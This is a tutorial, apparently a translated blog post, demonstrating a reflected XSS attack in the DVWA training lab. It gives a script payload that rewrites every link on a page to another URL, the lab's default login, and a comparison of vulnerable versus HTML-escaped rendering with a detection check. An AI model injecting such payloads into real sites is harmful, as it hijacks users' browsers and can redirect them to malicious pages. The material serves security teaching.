XX Attacks: Hijacking the User's Browser with a Reflected XSS Attack
2022-07-01 08:06:00 【Cwillchris】
We first construct a reflected XSS payload and then visit the vulnerable page. The attack could be carried out directly in DVWA, but for demonstration purposes we built a relatively complex environment.
```html
<script>
// Run once the page has finished loading, so every <a> element already exists.
window.onload = function() {
    // Collect every <a> element on the page (an array-like HTMLCollection).
    var link = document.getElementsByTagName("a");
    // Rewrite the href of each link to the attacker-chosen URL.
    for (var j = 0; j < link.length; j++) {
        link[j].href = "http://www.baidu.com";
    }
}
</script>
```
JavaScript code analysis: window.onload runs the anonymous function once the page has finished loading.
What the function does: document.getElementsByTagName collects every a element on the page into the array-like collection link, and the for loop rewrites the href of every element in link to the malicious URL.
Open the Chrome browser and test the effect on the reflected XSS page.
Log in at http://192.168.98.66/DVWA-master/login.php with username admin and password password, and set the security level to low.
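As an added example (not code from the original post or from DVWA): the reflected XSS page echoes a query parameter straight into the HTML, which is why the script above becomes live markup. Below, a vulnerable renderer sits beside a hardened one that HTML-encodes the reflected value, with the post's own payload used as the input; the function names and the assumption that the reflected parameter is called `name` are mine.

```javascript
// Added example, not part of the original post. Models the DVWA "low"
// reflected-XSS page: a query parameter is concatenated into the response.

// Payload from the post (constructed here as a one-line string): rewrites the
// href of every <a> on the page to a single URL.
const LINK_HIJACK_PAYLOAD =
  '<script>window.onload=function(){var link=document.getElementsByTagName("a");' +
  'for(var j=0;j<link.length;j++){link[j].href="http://www.baidu.com";}}</script>';

// Vulnerable: the parameter (assumed to be called `name`) is inserted as-is,
// so a <script> element in it is parsed and executed by the victim's browser.
function renderGreetingVulnerable(name) {
  return '<pre>Hello ' + name + '</pre>';
}

// Mitigation: encode the five HTML-significant characters before output.
// The browser then displays the payload as literal text and never runs it.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderGreetingSafe(name) {
  return '<pre>Hello ' + escapeHtml(name) + '</pre>';
}

// Defender-side check usable in a unit test or code review: does the rendered
// HTML still contain an active <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('vulnerable reflects script:', containsScriptTag(renderGreetingVulnerable(LINK_HIJACK_PAYLOAD)));
console.log('hardened reflects script:  ', containsScriptTag(renderGreetingSafe(LINK_HIJACK_PAYLOAD)));
```

Run with `node` to see the vulnerable renderer report `true` and the hardened one `false` for the same input.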